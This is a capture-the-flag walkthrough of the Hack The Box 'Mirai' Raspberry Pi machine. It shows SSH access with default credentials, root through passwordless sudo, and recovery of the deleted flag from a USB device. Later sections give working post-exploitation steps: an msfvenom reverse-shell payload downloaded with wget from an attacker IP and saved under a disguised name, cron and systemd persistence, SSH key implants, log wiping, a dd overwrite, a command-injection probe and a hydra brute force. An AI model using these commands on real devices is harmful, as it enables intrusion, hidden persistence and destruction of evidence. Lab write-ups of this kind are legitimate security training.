Machine Synopsis#
Key Exploitation Techniques:
- Default SSH credentials for IoT devices (Raspberry Pi)
- Sudo misconfiguration (
NOPASSWD: ALL) for immediate root access - File system forensics using
dfandstringsfor deleted data recovery - USB device analysis and data reconstruction
Reconnaissance & Enumeration#
Port Discovery#
$ nmap -sC -sV -A 10.10.10.48
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
IoT Device Identification#
Key Indicators:
- dnsmasq DNS service (common on IoT devices)
- lighttpd web server (lightweight, IoT-friendly)
- SSH version patterns consistent with Raspberry Pi
Web Application Analysis#
# Add hostname to resolve web interface
$ echo "10.10.10.48 mirai.htb" >> /etc/hosts
# Directory enumeration
$ dirsearch -u http://mirai.htb -w /usr/share/dirb/wordlists/common.txt
[21:05:29] 301 - 0B - /admin -> http://mirai.htb/admin/
Accessing /admin reveals a Raspberry Pi dashboard/control interface, confirming IoT device identification.
Exploitation#
Default Credential Testing#
IoT devices, particularly Raspberry Pi systems, often retain default credentials:
Common Raspberry Pi Defaults:
pi:raspberrypi:piadmin:admin
# Test default SSH credentials
$ ssh pi@10.10.10.48
pi@10.10.10.48's password: raspberry
pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.4.50+ #970 Mon Feb 20 19:18:29 GMT 2017 armv6l GNU/Linux
Success: Default credentials pi:raspberry provide immediate SSH access.
User Flag Retrieval#
pi@raspberrypi:~ $ ls
background.jpg Documents Music Pictures python_games Videos
Desktop Downloads oldconffiles Public Templates
pi@raspberrypi:~ $ cat Desktop/user.txt
ff837707441b257a20e32199d7c8838d
Privilege Escalation#
Sudo Enumeration#
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Critical Misconfiguration: User pi has unrestricted sudo access without password requirements.
Root Access#
pi@raspberrypi:~ $ sudo bash
root@raspberrypi:/home/pi# whoami
root
root@raspberrypi:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)
Root Flag Investigation#
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Challenge: Original root flag has been deleted, backup exists on USB device.
Digital Forensics & Data Recovery#
File System Analysis#
# List mounted filesystems
root@raspberrypi:~# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/root 1.3G 1.1G 143M 89% /
devtmpfs 483M 0 483M 0% /dev
tmpfs 487M 0 487M 0% /dev/shm
tmpfs 487M 13M 475M 3% /run
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 487M 0 487M 0% /sys/fs/cgroup
/dev/mmcblk0p1 41M 21M 19M 53% /boot
/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick
Key Finding: USB stick mounted at /media/usbstick (device /dev/sdb)
USB Device Investigation#
root@raspberrypi:/# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root 1024 Aug 14 2017 .
drwxr-xr-x 3 root root 4096 Aug 14 2017 ..
-rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt
drwx------ 2 root root 12288 Aug 14 2017 lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Data Recovery using strings#
# Use strings to recover deleted data from raw device
root@raspberrypi:~# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Data Recovery Success: Root flag recovered: 3d3e483143ff12ec505d026fa13e020b
Post-Exploitation Techniques#
Persistence Methods#
SSH Key Persistence#
# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f mirai_persistence
# Install as pi user
# mkdir -p /home/pi/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /home/pi/.ssh/authorized_keys
# chmod 600 /home/pi/.ssh/authorized_keys
# chown pi:pi /home/pi/.ssh/authorized_keys
# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
Cron Backdoor#
# Create reverse shell payload
$ msfvenom -p linux/armle/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor
# Install persistent cron job
# wget 10.10.14.6/backdoor -O /usr/bin/.system-update
# chmod +x /usr/bin/.system-update
# echo "*/15 * * * * /usr/bin/.system-update" >> /etc/crontab
Service Installation#
# Create systemd service for persistence
# cat > /etc/systemd/system/system-monitor.service << 'EOF'
[Unit]
Description=System Monitor Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/.system-update
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
EOF
# Enable service
# systemctl enable system-monitor.service
# systemctl start system-monitor.service
Defense Evasion#
Log Sanitization#
# Clear system logs
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/messages
# > /var/log/wtmp
# > /var/log/lastlog
# Clear command histories
# > /root/.bash_history
# > /home/pi/.bash_history
# Clear DNS logs
# > /var/log/dnsmasq.log
Configuration Hardening (Anti-Forensics)#
# Disable USB mounting
# echo "blacklist usb_storage" >> /etc/modprobe.d/blacklist.conf
# Secure deleted data
# dd if=/dev/urandom of=/dev/sdb bs=1M count=10
IoT-Specific Reconnaissance#
Hardware Information#
# Raspberry Pi model identification
# cat /proc/cpuinfo | grep -E "(Hardware|Revision|Model)"
Hardware : BCM2835
Revision : a02082
Model : Raspberry Pi 3 Model B Rev 1.2
# GPIO pin status
# cat /sys/kernel/debug/gpio
# Temperature monitoring
# /opt/vc/bin/vcgencmd measure_temp
temp=42.8'C
Network Interface Analysis#
# Wireless interface enumeration
# iwconfig
# iw dev
# Bluetooth devices
# hciconfig
# bluetoothctl list
IoT Service Discovery#
# Check for IoT-specific services
# systemctl list-units | grep -E "(gpio|i2c|spi|uart)"
# Examine boot configuration
# cat /boot/config.txt | grep -v "^#"
# Check for camera module
# /opt/vc/bin/vcgencmd get_camera
Alternative Exploitation Methods#
Web Interface Exploitation#
# If admin panel is accessible, test for:
# - Default web credentials (admin:admin, admin:password)
# - Command injection in configuration forms
# - File upload vulnerabilities
$ curl -X POST http://mirai.htb/admin/config.php \
-d "command=; id; #"
Brute Force Alternative Credentials#
# Common IoT credential combinations
$ cat > iot_creds.txt << 'EOF'
pi:raspberry
pi:pi
admin:admin
admin:password
root:raspberry
root:root
user:user
EOF
# Automated SSH brute force
$ hydra -C iot_creds.txt ssh://10.10.10.48 -t 4
USB Forensics Alternative Methods#
# Alternative data recovery tools
# photorec /dev/sdb # GUI-based recovery
# testdisk /dev/sdb # Partition recovery
# dd if=/dev/sdb | xxd | grep -A5 -B5 "root.txt"
# File carving with scalpel
# scalpel -b -o recovery_output /dev/sdb
Network Service Exploitation#
# DNS service enumeration
$ dig @10.10.10.48 mirai.htb
$ nslookup mirai.htb 10.10.10.48
# HTTP service exploitation
$ nikto -h http://mirai.htb
$ dirb http://mirai.htb /usr/share/dirb/wordlists/common.txt
Hardware-Specific Attacks#
# If physical access available:
# - SD card extraction and mounting
# - UART/Serial console access
# - GPIO manipulation for hardware backdoors
# - Boot process interruption